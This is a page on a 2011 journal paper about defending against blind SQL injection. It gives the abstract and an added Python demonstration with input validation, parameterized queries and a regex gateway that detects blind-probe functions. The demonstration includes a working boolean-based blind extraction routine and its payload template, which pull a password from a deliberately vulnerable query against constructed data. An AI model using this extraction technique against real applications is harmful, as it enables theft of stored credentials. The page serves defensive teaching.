Abstract
As Web application technology grows more complex, SQL injection, and blind SQL injection in particular, has become one of the most common attacks against databases. This paper analyses the principle and attack process of blind SQL injection and proposes a two-layer hybrid defence: input validation at the Web server layer, to reduce the site's injectable surface as a whole, followed by a security gateway at the database layer that filters injection statements in real time. Experiments show that the hybrid defence module effectively protects a Web site's injection vulnerabilities and improves the security of the Web application.
As Web applications become more widespread, SQL injection, and blind injection in particular, has become the most popular method of attacking databases. The fundamental principles and attack process of blind injection are analyzed, and a duplex prevention design is proposed. The first step uses input validation to decrease the risk of SQL injection; the second step deploys a secure gateway to filter injected statements. Experiments show that this duplex module effectively prevents injection risk in web sites and increases the security of web applications.
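The abstract names the attack (boolean-based blind injection, where the page leaks only "row found / not found") and the two defence layers without showing either. The following is an added, self-contained example written for this page, not code from the paper: it builds a constructed in-memory SQLite table, recovers a password column character by character through a vulnerable endpoint, and then shows the two layers the abstract describes. The function names, the `validate_id` rule and the keyword pattern in `gateway_allows` are illustrative assumptions, not the paper's actual rule set.

```python
import re
import sqlite3

# Constructed sample data for the demonstration (not from the paper).
SEED_ROWS = [(1, "alice", "s3cret"), (2, "bob", "hunter2")]


def make_db():
    """In-memory SQLite database standing in for the application's backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SEED_ROWS)
    return conn


def vulnerable_exists(conn, user_id):
    """Unprotected endpoint: concatenates the request parameter into SQL and only reveals
    whether a row came back. That one bit per request is all blind injection needs."""
    sql = "SELECT username FROM users WHERE id = " + user_id
    return conn.execute(sql).fetchone() is not None


def blind_extract(oracle, victim_id, max_len=32):
    """Boolean-based blind extraction of one row's password column.
    `oracle(payload)` must answer True/False like the endpoint above. Each character is
    found by binary search over its code point, one yes/no query per step. Past the end
    of the string substr() returns '' and unicode('') is NULL, so every probe answers
    False and the search converges to 0, which terminates the loop."""
    secret = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127  # search the ASCII range for the character at this position
        while lo < hi:
            mid = (lo + hi) // 2
            payload = (f"{victim_id} AND unicode(substr((SELECT password FROM users "
                       f"WHERE id={victim_id}),{pos},1)) > {mid}")
            if oracle(payload):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        secret += chr(lo)
    return secret


# ---- Layer 1: input validation at the web server (assumed rule for an integer id) ----
def validate_id(raw):
    """The id parameter must be a short decimal integer; anything else is rejected."""
    return re.fullmatch(r"[1-9][0-9]{0,8}", raw) is not None


def safe_exists(conn, user_id):
    """Validated input plus a parameterized query: the payload never reaches the parser."""
    if not validate_id(user_id):
        return False
    row = conn.execute("SELECT username FROM users WHERE id = ?", (int(user_id),)).fetchone()
    return row is not None


# ---- Layer 2: a database-side gateway inspecting the final SQL text (assumed signatures) ----
BLIND_PATTERNS = re.compile(
    r"\b(and|or)\b\s+.*\b(substr|substring|unicode|ascii|length|sleep|benchmark)\s*\(",
    re.IGNORECASE,
)


def gateway_allows(sql):
    """Refuse statements carrying typical blind-probe functions behind a boolean connective."""
    return BLIND_PATTERNS.search(sql) is None


def gated_exists(conn, user_id):
    """Same flawed concatenation as vulnerable_exists, but the statement must pass the gateway."""
    sql = "SELECT username FROM users WHERE id = " + user_id
    if not gateway_allows(sql):
        return False  # blocked statements look like 'not found' to the attacker
    return conn.execute(sql).fetchone() is not None


def demo():
    conn = make_db()
    return {
        "leaked_via_vulnerable": blind_extract(lambda p: vulnerable_exists(conn, p), 1),
        "leaked_via_gateway": blind_extract(lambda p: gated_exists(conn, p), 1),
        "safe_normal_request": safe_exists(conn, "1"),
        "safe_tautology_request": safe_exists(conn, "1 AND 1=1"),
    }


if __name__ == "__main__":
    print(demo())
```

Run as a script it prints that the unprotected oracle leaks `s3cret` in roughly seven requests per character, while both defended paths leak nothing. The two layers are not equivalent: the validation-plus-parameterization path removes the injection entirely, whereas the gateway is a signature filter and can be evaded by rewriting the probe (comment tokens instead of whitespace, different functions), which is why the abstract positions it as the second layer rather than the only one.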
Source
Science Technology and Engineering (《科学技术与工程》), 2011, No. 13, pp. 3104-3107 (4 pages)